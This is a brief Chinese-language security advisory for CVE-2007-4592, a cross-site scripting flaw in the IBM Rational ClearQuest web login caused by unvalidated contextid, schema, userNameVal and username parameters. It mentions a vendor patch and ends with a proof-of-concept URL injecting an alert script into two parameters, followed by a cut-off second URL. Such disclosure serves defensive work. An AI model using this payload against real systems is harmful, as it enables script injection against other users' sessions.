BUGTRAQ ID: 28296
CVE(CAN) ID: CVE-2007-4592
IBM Rational ClearQuest是全面的软件变更、追踪管理解决方案。
Rational ClearQuest没有正确地验证对contextid、schema、userNameVal、username变量的输入参数,允许远程攻击者通过提交特制的URL请求执行跨站脚本攻击。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.ers.ibm.com/” target=“_blank”>http://www.ers.ibm.com/</a>
http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//
http://www.website.com/cqweb/login?